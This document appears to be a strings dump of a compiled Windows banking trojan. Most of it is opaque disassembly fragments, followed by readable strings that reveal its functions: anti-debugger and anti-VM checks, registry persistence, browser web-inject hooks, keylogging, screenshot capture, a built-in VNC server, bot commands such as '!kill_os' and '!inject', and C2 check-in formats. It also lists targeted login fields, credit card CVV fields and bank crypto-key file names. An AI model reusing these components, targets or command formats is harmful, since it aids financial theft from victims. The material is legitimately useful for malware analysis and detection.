U8S3VW=pQ
EEEEEEj
;ur[3j
]EEEEEE
Wu43D$
D$ D$$D$(D$,D$0D$4D$
Wu43D$
D$ D$$D$(D$,D$0D$4D$
WPQRSu
WPQRSbu
t[H$@ ;u"E
38t%>
u38t-$
URUPMQSh
@:u+V@3;t'x
@:u^E;t
3SRfM3
@:u3fE
totktg}
<#t/<
t'<*tP
CFG;u3;u
;t8;us+
@uMQ+RUPE
tdSVW]tGE
VR+PQV
u_^[h
UtSVWD$(P
QRWWSSP
D$DL$HD$\
fT$f<
WjBD$`(
L$h\$p\$t\$x\$|$
T$HSL$\QPRSD$(D$$VP
SSW6BM
T$BfD$@\$,
SPVD$4
SL$ Qj
SSV\$0
Sj(SPVD$0
SL$$Qj(T$dRV
Sj(SPV
\$ 9\$
t@;t<j
SWSPVD$0
SL$$QWRV
@u+PSD$ MT$
3QQ3PW
@u|$ +OO
3QQ3PV
T$ RVSW
3EEEVPE
@u+t4E
U<SVWj,D$ j
QQQQjWQQ
Mu_[t#EPVE
^]VB^]U0
DFu_^]U
u'MQMUREPj
u'URUEPMQj
SVW3hh
@u+S[u
VW3u5tds
_^U<SVW
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
EPEQURWVP
@u+3@t(x
URUPMQWVR
@u+3@t(x
@uM+PE
SVWh$5
S%_^[U0
VPuuuuE
|U SS4
EPEMQURh
tyE$trj
M QWVS
t#E PSE
EPV&Vj
E_^[]$
^]_[3^]U
@SVWe3
;}rn]3E
]3EEEEEE
@uS+W^_
@u+tt0
t#URVE
MQURUMQj
@u+PVX
t#URSE
PEVuPEQSWRh
@u+Eo_
t#URVE
t#EPVE
t#MQVE
t#URVE
t#EPVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
u9PPPh@
t#MQVE
t#URVE
_^3]UQVj
t#EPVE
SVW3Wj
9txQhPX
SVW3D$
t$0t$4t$dt$h$
t$Lt$P
;tZD$@P$
QT$`RD$0PW
L$$3L$
D$ PWt$(
t$8t$<t$Tt$Xt$tt$x$
;tQL$xQT$lRD$PPL$8QS
W<D:PPD$
t$Dt$Ht$|$
t$lt$pt$\t$`
D$4;tUT$PRL$dQT$xRL$DQP
;t(?SV
@uSV+W
UMQPPPh
@u+t"|
MQRURh?
@u+@PEVj
P_^[]U
EMPQDh
FMu_[^]
EEEEEEEF
V$PQj R
t:F(~2N
_^3[]3h
F4F(F,
j P}~$
<Nt <Ft
B;U|_^[]U SV~4
t2F(~*N
_^[]VW
;u_^3_^U
Vtct_WS
tEWSV
WV#WV|R
=GET t
=POSTu
E3EEEEEEj
;}r_3j
EEEEEE
=GET t
=POSTu
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
E 3EEEEEEEj
;ur^3j
EEEEEEE
VWPQSR
E3EEEEEEEj
;ur^3j
EEEEEEE
_^W3_UE
[]_2[]U,
L$8D$(}]
RD$@PS
8D$9u|$
D$;HD$
QT$@RS
~AD$8P
T$4D$,|$,t$4
j@L$\Q
uvT$XR
T$0D$4|$(t$4L$0
RD$LPW
QT$<RV
RD$LPW
u'MQMUREPj
u'URUEPMQj
MSVWPPQh
t#URVE
_^[]Ujh
MEPj@j
hPVFE3E
tPVF39
$PVF39
PVFMQV
EPj@QW:
URj@VS
UMQRVS
t#EPVE
Nu)9uu
V3tbSVVVVjPVV
<#t3<
t+<*t[
BFG;uE
r^_3[]
u)3t#U
F;r^3[]
33fEEfMEPMQU
t U+fE$fEM
tj;uad
@uVW+OO
@uW+OO
@u+PSr3h
@uVW+OO
@uVWh\
@uSVWh\
|_^3[]
t'VMQPE
jdUQVhx
@uVWh`
EEEUEEEfEU
EEEUEEEfEU
t#EPVE
@uSVW+OO
EEEUEEEfEU
EEEUEEEfEU
EEEUEEEfEU
3EEEEEEEfEEE
EEEUEEEfEU
3EEEEEEEfEEE
@uSVW+O$
3FVRhd
|_^3[]
@uVW+OO
SVW=XR
l$_^[]U
@u|$(+OO
@u|$(+OO
@u|$(+OO
@u|$(+OO
@u+P$t
PD$02D$
SP\$$x
@u+P$$
_^[]US]
up3;tNVVShP
P_^3[]
t#URVE
?POSTuZ
t#EPVE
@u|$(+OO
@u|$(+OO
PL$,Q5
@u|$(+OO
@u|$(+OO
@u+P$t
_^]Qhh
@uVWhl
@u+PV3h
@uSVWhl
|_^3[]
t'VMQPE
^]UQSVW=XR
a_^3[]U
@uSVW+O$
3FVRhd
|_^3[]
@uSVWhp
UQSVW=XR
_^3[]U
@uVW+OO
^]_[3^]U3$9E
3EEEEE
@uSVWht
|_^3[]
t'VMQPE
3SVWD$
3VVVVjWVV
P3St$ t$$
VVSt$(
3QQQ3PS
@uSVWhx
@u+PVs3
@uSVWhx
|_^3[]
UQSVW=XR
_^3[]U
SV3Wt$
D$ PWt$(t$,
SD$(D$$j
3QQQ3PW
_^[]U$
@u+PS$
@uSVWh|
|_^3[]
UQSVW=XR
_^3[]U
@u+PVe_^[]
@u+PRmc_^[]U
@uSVWh
|_^3[]
3^]3]UQSVW=XR
_^3[]U
uEVPPPh
@uSVW+O$
3FVRhd
|_^3[]
3^]UQS
UQSVW=XR
a_^3[]U
@uSVWh
|_^3[]
@uVW+OO
@uW+O$
@uSVWh
|_^3[]
@uVW+OO
_^t9HH
@u+PQI_^[]U
@uVW+OO
@u+PV7Eh
@uSVWh
|_^3[]
Hjd?UQS
@uSVWh
|_^3[]
Hjd?U,
.iniPj
@u+PRb<h@
_^3[]U
@u+PQ9_^[]U
@u+PV:8_^[]
@u+PV*6j
t#EPVE
@u+PS2E@E;E
u[E<C3
@u+PRT1hp
UQSVW=XR
a_^3[]U
UQSVW=XR
a_^3[]U$SVWPj
8ADVAu
E_^[]U(SVu
;t@EPMQUREPS
MQPPPh
@u+t|
@u+@PESj
URMEPh?
@uM+@PWj
SVW3h$
EPQRWV
URUPWQR
;|}u[(j
SVWEPh
EMQVURj
t)t%Vj
_^3[]_^[]U
URtPEPW
tEW5\3?
u[_^]U
URtPEPW
tEW4[3?
u[_^]U
t.u:ERPltEP
RV [=P
3EEEEEEEj
E]UXVE
VE3SSE
SSVQRSSW
};tuh
3PSPPPQW
?[_3^]
fEBME6
SVW3h
mE_^[]U4
VW3EPWWj
uzMQURPEP
uc9}t^uti=U
tIEMQURj
_^]UQE
|_^[]U
MEUEE(|
G@;|ME
3A}u]=
]f:M}U
]uu_^[]U SV3H
DU@fDU3
Mu_^[]
S3V]]9,
_^[]UQj
u3]UQj
;F u!N$t
f9UuHEH49Mv=j
2UQS3W8^$u
t#EPWE
;t-MQWE
S3VW^P^X^T^L^D^d^H;u
_^[]SSj
E;t-];t
E_^[]_FT
^3[]U S3W^P^X^T^L^D^d^H;
u2F<PN0QFDPV,R;u}SSSW
~P3_[]
EPMQUR
F<^0^4^8~P3_[]
_[]U$S3
EP^P^X^T^L^d^HF,
EPMQUR
^0^4^8F<3[]UE
Wt=F`~\;sr+;v
oFL_[]
7FL_[]
t,W~Pt#EPWE
UQSVW^hS
t&t!WS;u#
E_Fd^3[]_^
{PSXCT
{L{d{H{\{`
C0UEC0
x9SLKD
K(_^[]
USVW=P
3;t+hp@
^$^(^P
u,8^$u'E
;t#VSP
T$LRQPD$
L$\QWh
u_^2[]
P.@/H<H@HDP,
fP0fP2@4
fp0fp2fp4^:t
H8[f@6
[UQSVhP
MQVLR4
EF0W~,EG
CPCTEt
_^[ULSVW=
;|++Fd+
Vh;|*+Fl+
~%FtNp
VPFxQFl
MVfFEFEN&F
Ou_^[]
EM;thu
?;u_[^]
9t5V$
W9;t7E
QRt6?;u;u
G6;u_^[]
u[^V7>
QPV]8W
M;~n;~
QR@u*G
RPt&9w
V_^[]
;UuM^;|
SWPQ_[]j(
;u^US]
VPQK|W
fEfuf}u
UUEEM;M}
EEfMfM
UUfEfE
MMfUfU
EEfMfM
E9E}3MM
MMUUE;E}
UUfEfE
MMfUfU
EEfMfM
UUfEfE
U9U}5EE
MMUUE;E}
UUfEfE
MMfUfU
EEfMfM
UUfEfE
U9U}3EE
fMfuf}
QPV{t@u
U0SV5R
EUPURQ
@uM+QE
j({$C(
f{*C,C0C4`v
CL{P{TV
RPWWj(CX
C)_^[]
r.N;s!
}RFB u
USVWjA
fP,H0P4
*fffff
;t9p$u
HLVW0u
3@fEfUu
HXVW0u
@u+@fEu
SVW3h<
`WQ\Ws
@uT+OO
@u+@PLQPRj
S33_^[]
j,\QRp
@PQPRj
33_^[]
MQWRW@P}}
2_^[]E
UIPSE5
Mu!E;s
ME@E }}}NEj
_^[]_^
@u+@PDQPRj
UPQR\h
MQWSP.UR<P
U$SVWj
V_^[]j
E3F,^+Tv
VMQUREPE
RPQ0F\WP
NXWQ[VLWRQW
R_^[]j
Ft^x_^[]
Ft^x_^[]
Nx_^[]j
EMPEQMPQV_^[]j
fUfMfU
QRV_^[]j
URV_^[]j
_^[]fU
VXFLRPM
]t8E;|
FLPWNF\PWu\O
FLPV\RPEnF\P
}SWNSxFPNT]
VLFXRP
NXSQ{VXWRq~\
3FPFT8Ev
3P]MQE,tq
URMQW}Uge
MUB~4x
A~0UR@
3P]=MQEqtpEU
MQMQR}Ud
MQMQR}Uc
EGu]}G
t%;~!]
U;tUREPW}
ERQWPVM9RQWPVS
-RQWPVv
tY}MQP
QLURCE_^[]
fMfMfMfMfEfM
fuf}fEu
;r'J;s
;r,J;s!
;r,J;s!
SV3tG\
@;r1Q;s#$
@Q;rIM
@;r,Q;s
@Q;rIM
@;r3Q;s%
@Q;rIEH
4fVI"T6
CE_^[]
r.J;s!
uJ~F=U
u[URPj
u{UR3VPVO
QSP_^[]
6_^2[]
QPVt@u
333;;s&K
;|_^[]
@A;ru$N
+U S]$~1V
+U S]$~/
333;3s)8C
3~;+Wd$
F@;|_^[]
A;rU$J
+U W}$~5S
+U W}$~3
333;:s,8B
F@;|_^[]
A;rU$J
+U W}$~3S
+U W}$~1
333;s)8G
GW;}rEM U$
~C4vSu
@W} M
E;shd$
;]ruE$
z_^[]
~<V4X;s%:]
f<{fx;r}
~M;sdE
f~;ur} EM$
@W} u 4F
;]rE$M
z_^[]
] ;sP2M
;]ru}E$
m_^[]
~:V4;s#:]
~;ur} EM$
@W} u
;]rE$M
E ~ S]
P,SWx,:
:X/u\tHf
f;X0uKf
f;X2u>f
f;X4u1
_[F|05
VUUUm
B<J<tI
_PVR_U
p2_^[]
Eu3~$}u
s?E3~$}u
S3;tkW=
tF ;t
^$_[U4S
fuIf9G
u+8F/t&
M3Ef;O
uf;srM3ME
@E;|_^[]
EMu_^[]UdE
F4E3E9E
#u#}#EMMM
#]E#E#UMMME
;E|EMU
{g_tBE
MUPEQRPbE
P]V[^[]
KXQ]V[^[]
SPQVt%F4+
F0W;~8M
SQPVxt
VPQK|W
fEfuf}u
UUEEM;M}
UEEMMUUEE
U9U}3EE
MMUUE;E}
MUUEEMMUU
M9M}5UU
PoE_^]
MMUUE;E}
MUUEEMMUU
M9M}3UU
EUREPV}U
MMMM9M
3It-It%
EM#E#U
E#]3M#EM
Ht9Ht.
t"3~03I
;|_^[]
USVWhP
P,S,P0S0P4S4@8QC8
V2W8Tv
i3_^]E
xi3_^]_^]U
hrL=8}
5hL=8}
3:_3^J
U;Us$E
M}!wU
MUUE;Er
+EEM;M
)2_^[]
3fu&fE
URMQURMQ
ERUQMRPQRS
O_^2[]
MMUUE;E}
E9E}3MM
UREPUREP
f;Et@;
EQMRUPQRPS
ulMUQREE
EEMMU;U}
E9E}5MM
UQSVWE
_f2^[]
UREPUREPE
MUPEQMRUPQRS
EEMMU;U}
U9U}3EE
UQSVWE
^F^[]F$
^[]UQ=]
Ht-HuF93
#__{UQSVWj
V_^[]J;s!
uL~H=U
F(9F$u
wN(V Wh
GLHGT7G
WXF(N h
G8F(N RP
G@F(N RP
V(PF R
9W8tG9W@tB9WDt=;t9
V3;t`P
;tY9p tT9p$tOp
_^U3V;
S^(>N(*
u0F([3^]
[F(3^]
*t(Et#It
N$PF(P
N$PF(P
N$PF(P
N$PF(P
F(N$RP3q
F,NLVD
F<3fDJNLFDWT
~l~\~t~h~HV|FxF`_U
WlG|O8SV
Gp;U}+\
]U_4#]
(Ot^[;v
}^<+^tFlN,+
];r^F8W
VLFD)~p)~l
3#FTFH
N<;sj~l
_[]UQSVu
FlN\EVlFt
Nl>N\G
V\NlF,+-
Nl>N\G
s"QFt]
rjFHNXVl~4N8
3#FTND#V@FHf
zNl#N4V@
JNHVDf~lf<Jt
PhF`~`
fNlf+Np
)FtNt]
rZHF`$
~lVlN8
^HNXND3#FT^4FH
FlNHVDf
VlNXF`
3#FTFH`VlF8
3Vl+RP3
Fl>F\G
D_^3[]
rIFHNXVl~4N8
3#FTND#V@FHf
zNl#N4V@
JNHVDf~lf<JN`Vp
NxVd^`tO;
sGVlN,+
fVlf+VdFxf+
^lVl;w>FHNX^4N8
3#FTNDFH
FlNHVDf
Nl>N\G
f_^3[]
3Vl+RP3
Fl>F\G
NlNtNhl~h
tFVlF8D
FlUNlF8
3Vl+RP3
Fl>F\G
USVW~t
3+PQ3?
Fl>F\G
Em@@E;E|u
UEM@@ME;
r$E@;F
RSWjEFE;u
GE;s3+M
OM;s0+
|E@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
GE;s3+M
OM;s0+
PQSRN}
|E@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
GE;s1+U
GE;s)+
U;UrE@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
3EEfBff
GE;s1+U
GE;s)+
U;UrE@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
3EEfBff
uS4u;sg
;r[_^]
E;s4+U
RPSQR3
UM;slJ
H9EuwE
;EsoMI
;ErMAM;M
M;s0d$
;Er_^[]
?_^3[]
PG|,QR
PEQRPhH[
UEM@@ME;
3U~\d$
u#UB;V
uS4u;sh
;r[_^]
E;s4+U
UM;smJ
H9EuvE
;EsnMI
;ErMAM;M
;Er_^[]
?_^3[]
PG|,QR
PEQRPhH[
UEM@@ME;
3U~\d$
u#UB;V
PG|,QR
PEQRPhH[
UEM@@ME;
;]r_[]
PG|,QR
PEQRPhH[
UEM@@ME;
;]r_[]
PG|,QR
PEQRPhH[
UEM@@ME;
r$E@;F
PG|,QR
PEQRPhH[
UEM@@ME;
r$E@;F
fEC,fuEu
_^2[]
H H(H,H0H8H<J
HlHPHL
O$PG(PF4
^P^SW3;u
_(9_$u
G(O Vh
W(G$VRG
^_[US]
Wu)N$S
F0F,V(+{
F(;r)K
V4P+QR6
+WPF4P6
~0_N,^3[]
^09F0u
N,_^3[]
UEMRPQ
Oh;O\sPI
fLWpGhOh
3fTOpGh9Ghr
+OhfTOpGhB
E;r+Oh
WhMfLWpGh}
G`POpQj
GlOlGP
RW`GXPQOd
QDWpPj
OHtE;s'
OHt@;s"}
U+UOD;vI+
M+MW@M
}+9Mt$U
t,N$t%@4t
V(F$QRF
?}tTM\
J}u_^[]U Vu3
4Bft5f
DU@fDU3
Mu_^[]
IRj_[]
@PAQBR
U]tz+4@m
+;~PffH
+;~VffH
^8^<^@@Jt
_^3[_^[
F$V(RLu
[_2[UU
C$S(KuT{(
U<SVWM
H4UPLM
HPUMHT
HXEx<E
u^;s?+
U9Us?;us:U
Ex<_^X8Q
EEEEEEEE3t
FfDMLM@;r
3t&f<F
FfDUTU@;r
tEHtExc
U<_^[]
#u#u;u
;Us"tU
UVWS|$
+t~:D5
uX[_^]
name.key
\secrets.key
sign.key
kernel32.dll
CreateFileW
\explorer.exe
GetFileAttributesW
user32.dll
GetWindowTextA
OLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
SystemDrive
Software\Microsoft\Windows NT\CurrentVersion
InstallDate
SYSTEM
%s!%s!%08X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
software\microsoft
Global\
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
%dd %dh %dm
CLOSED
LISTEN
SYN_SENT
SYN_RCVD
FIN_WAIT1
FIN_WAIT2
CLOSE_WAIT
CLOSING
LAST_ACK
TIME_WAIT
DELETE_TCB
netstat
{Proto
Local address
Remote address
taskmgr
Process name
[System Process]
netuser
Software\Microsoft\Internet Explorer\TypedURLs
IE history:
DAN NLD NLB ENU ENG ENA ENC ENZ ENI FIN FRA FRB FRC FRS DEU DES DEA ISL ITA ITS NOR NON PTB PTG SVE ESP ESM ESN TRK PLK CSY SKY HUN RUS GRE ALL
{BotVer:
{Process:
{Username:
PROCESSOR_IDENTIFIER
{Processor:
{Language:
%dx%d@%d
{Screen:
dd:MMM:yyyy
{Date:
HH:mm:ss
{Local time:
%c%d:%02d
{GMT:
{Uptime:
{Windows directory:
{Administrator:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
Dnsapi.dll
DnsQuery_A
DnsQuery_UTF8
DnsQuery_W
Query_Main
ws2_32.dll
getaddrinfo
gethostbyname
inet_addr
qwrtpsdfghjklzxcvbnm
eyuioa
1676d5775e05c50b46baa5579d4fc7
!verif
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
6d3ad29879a90b4dd1b4f76e82166ca3
data.txt
ntdll.dll
ZwQuerySystemInformation
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_%08x
explorer.exe
Shell_TrayWnd
00000000000888888888@@@@@@@@HHHHHHHHPPPPPPXXXXXXXXXXXX`````hhhhhhhhhhpppppppppxxxxxxxxxx
000000000000000000000000@@@@@@@@@@@@@@@@PPPPPPPPPPPPPXXXXXXXXXXXhhhhhhhhhhhpppppppppxxxxxxxxxxxx
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
taskmgr
default
DefWindowProcW
DefWindowProcA
DefDlgProcW
DefDlgProcA
DefFrameProcW
DefFrameProcA
DefMDIChildProcW
DefMDIChildProcA
CallWindowProcW
CallWindowProcA
RegisterClassW
RegisterClassA
RegisterClassExA
RegisterClassExW
PeekMessageW
PeekMessageA
OpenInputDesktop
OpenDesktopA
OpenDesktopW
SwitchDesktop
MessageBeep
FlashWindowEx
GetCursorPos
SetCursorPos
GetMessagePos
SetCapture
ReleaseCapture
GetCapture
Winmm.dll
PlaySoundW
PlaySoundA
sndPlaySoundW
sndPlaySoundA
Kernel32.dll
Gdi32.dll
SetDIBitsToDevice
SetThreadDesktop
static
Content-Length
http://
NSS layer
https://
Referer
Content-Type
HTTP/1.
Transfer-Encoding
chunked
Connection
Proxy-Connection
identity
Accept-Encoding
If-Modified-Since
nspr4.dll
PR_Write
PR_Read
PR_Close
PR_OpenTCPSocket
PR_GetError
PR_SetError
PR_GetNameForIdentity
UserAgent
[[[URL: %s
Process: %s
User-agent: %s]]]
Accept-Encoding:
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
InternetCloseHandle
set_url
data_before
data_end
data_inject
data_after
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
%02u.bmp
***************************
***************************
[/pst]
GetClipboardData
\\.\PhysicalDrive%u
AppEvents
Console
Control Panel
Environment
Identities
Software
System
/topic.php
keylog.txt
passwords.txt
%s%u.zip
-----------------------------
Content-Disposition: form-data; name="pcname"
-----------------------------
Content-Disposition: form-data; name="file"; filename="report"
Content-Type: text/plain
RtlUniform
TranslateMessage
GetMessageA
GetMessageW
as743vgk0odastr
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.microsoft.com
Content-Length:
RtlFreeHeap
id=1&post=%u
frd.exe
!kill_os
&ret_val=ok
/faq.php
!activebc
&activebc=ok
!deactivebc
&deactivebc=ok
&load=ok
!inject
&inject=ok
!new_config
&config=ok
id=%s&ver=4.2.5&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
\chrome.exe
--no-sandbox
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_username=
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
CryptoPluginId=AGAVA&Sign
login=
password=
&ctl00%24MainMenu%24Login1%24UserName=
&ctl00%24MainMenu%24Login1%24Password=
advapi32.dll
CryptEncrypt
WSASend
WSARecv
name=%s&port=%u
/home.php
A B V G D E E J Z I Y K L M N O P R S T U F H C CHSHSH Y E YUYAA B V H G D E JE J Z Y I YI J K L M N O P R S T U F X C CH SH SH YU YA
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\%02d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
\private\
private.txt
\public\
public.txt
\*.key
\self.cer
\@rand
\ABONENTS*
crypto
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
found.
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
\crypto\
\micros~\crypto\
\maxthon3\public\
\microsoft\crypto\
\crypto pro\
\progra~1\crypto~1\
\temporary internet files\
:\users\public
\ryptopro
\cryptokit\
:\progra~1\common~1\crypto~1
bsi.dll
&cvv=&
&cvv2=
&cvv2=&
&cvc=&
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
FAKTURA
sks2xyz.dll
vb_pfx_import
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
BEGIN SIGNATURE
END SIGNATURE
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
DefaultPrivateDir
General
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
&txtSubId=
&txtPin=
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone=
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
RCN_R50Buffer
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
\SIGN1\
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
RSTYLE
Agava_Client.exe
UseToken
Containers
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
login.yota.ru
IDToken1=
IDToken2=
YotaConfirmForm%5Bpassword%5D
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
IsWow64Process
*SYSTEM*
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
kernel
waveOutOpen
winmm.dll
1234567890QWERTYUIOPASDFGHJKLZXCVBNM
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
inconsistent bit counts
not enough codes
too many codes
bad compressed size
ct_tally: bad match
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
RFB 003.006
LibVNCServer 0.9.7
unknown
%s (%s)
My Documents
Network Favorites
%02d/%02d/%04d %02d:%02d
No authentication mode is registered!
Your viewer cannot handle required authentication methods
password check failed!
SCardConnectA
SCardEstablishContext
SCardFreeMemory
SCardDisconnect
SCardListReadersA
SCardReleaseContext
WinSCard.dll
IsNetworkAlive
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MiniDumpWriteDump
dbghelp.dll
strstr
calloc
malloc
_snprintf
_strrev
strtol
isdigit
sprintf
strncpy
fwrite
realloc
fclose
isprint
strchr
MSVCRT.dll
GetModuleFileNameExA
PSAPI.DLL
NetApiBufferFree
NetQueryDisplayInformation
NETAPI32.dll
DnsFlushResolverCache
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetSetStatusCallback
InternetQueryOptionA
InternetConnectA
InternetReadFile
HttpOpenRequestA
InternetCheckConnectionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
WS2_32.dll
SHGetFolderPathA
ShellExecuteA
ExtractIconExA
SHFileOperationA
SHGetSpecialFolderPathA
SHELL32.dll
StrStrIA
PathFileExistsA
PathFindFileNameA
PathAddBackslashA
StrStrIW
StrToIntA
PathMakeSystemFolderA
PathAppendA
StrCmpNIA
StrNCatA
StrStrA
StrChrIA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
ntdll.dll
GetVolumeInformationA
GetSystemWindowsDirectoryA
GetModuleFileNameA
GetLastError
SetLastError
GetProcAddress
GetModuleHandleA
IsDebuggerPresent
GetTickCount
GetEnvironmentVariableA
GetCurrentProcess
AddVectoredExceptionHandler
GetCurrentThreadId
GetCurrentProcessId
GetSystemDefaultLangID
Process32First
GetTimeFormatA
GetDateFormatA
OpenProcess
GetTimeZoneInformation
Process32Next
CreateToolhelp32Snapshot
WaitForSingleObject
LoadLibraryExA
ReleaseMutex
lstrcpynA
GetTempFileNameA
WaitForMultipleObjects
GetTempPathA
GetSystemTime
CreateFileA
SetFilePointer
MoveFileExA
SetEndOfFile
SetFilePointerEx
UnlockFile
LockFile
WriteFile
IsBadWritePtr
ReadFile
CreateDirectoryA
GetFileSizeEx
FindFirstFileA
RemoveDirectoryA
SetFileAttributesA
FindClose
FindNextFileA
DeleteFileA
HeapReAlloc
HeapAlloc
HeapFree
ExitProcess
SetErrorMode
SetEvent
OpenMutexA
lstrcpyA
MapViewOfFile
UnmapViewOfFile
IsBadReadPtr
CreateFileMappingA
GlobalLock
GlobalAlloc
CreateProcessA
MultiByteToWideChar
GlobalUnlock
GlobalFree
CreateThread
HeapCreate
lstrcmpiA
OpenEventA
lstrcmpiW
OpenFileMappingA
CreateMutexA
GetComputerNameA
lstrlenA
CreateEventA
GetVersionExA
ResetEvent
GetCommandLineA
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetCurrentThread
GetDriveTypeA
SetThreadPriority
SetCurrentDirectoryA
GetLogicalDriveStringsA
CopyFileA
GetCurrentDirectoryA
GetProcessHeap
HeapValidate
HeapSize
GetCommandLineW
ExitThread
MoveFileA
WinExec
TerminateThread
FindNextChangeNotification
FindFirstChangeNotificationA
lstrcmpA
CloseHandle
FlushInstructionCache
InterlockedExchange
VirtualAlloc
GetThreadPriority
VirtualProtect
WideCharToMultiByte
GetVersionExW
GetFileAttributesA
GetFileAttributesW
GetShortPathNameA
GetPrivateProfileStringA
VirtualQuery
VirtualFree
CreateRemoteThread
GetProcessTimes
Module32First
GetHandleInformation
VirtualAllocEx
